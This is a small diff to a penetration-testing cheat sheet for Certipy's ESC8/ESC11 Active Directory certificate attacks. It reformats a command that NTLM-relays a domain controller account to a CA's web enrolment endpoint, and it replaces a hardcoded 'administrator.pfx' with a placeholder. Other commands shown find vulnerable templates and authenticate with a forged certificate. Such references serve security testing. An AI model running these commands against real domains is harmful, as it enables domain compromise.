--- a/arsenal/data/cheats/Active_directory/Certipy/ESC8_11.md
+++ b/arsenal/data/cheats/Active_directory/Certipy/ESC8_11.md
@@ -9,8 +9,7 @@ certipy find -u <username> -p '<password>' -target <CA_FQDN> -vulnerable -stdout
 
 ## 2a. NTLM Relay (Relaying Domain Controller account)
 ```
-certipy relay \
-    -target 'https://<IP_ADDRESS>' -template 'DomainController'
+certipy relay -target 'https://<IP_ADDRESS>' -template 'DomainController'
 ```
 
 ## 2b. NTLM Relay (Relaying User account)
@@ -26,5 +25,5 @@ certipy relay -target 'https://<IP_ADDRESS>'
 
 ## 5. Authenticate
 ```
-certipy auth -pfx administrator.pfx -dc-ip <DC_IP>
+certipy auth -pfx <ADMIN_USER>.pfx -dc-ip <DC_IP>
 ```
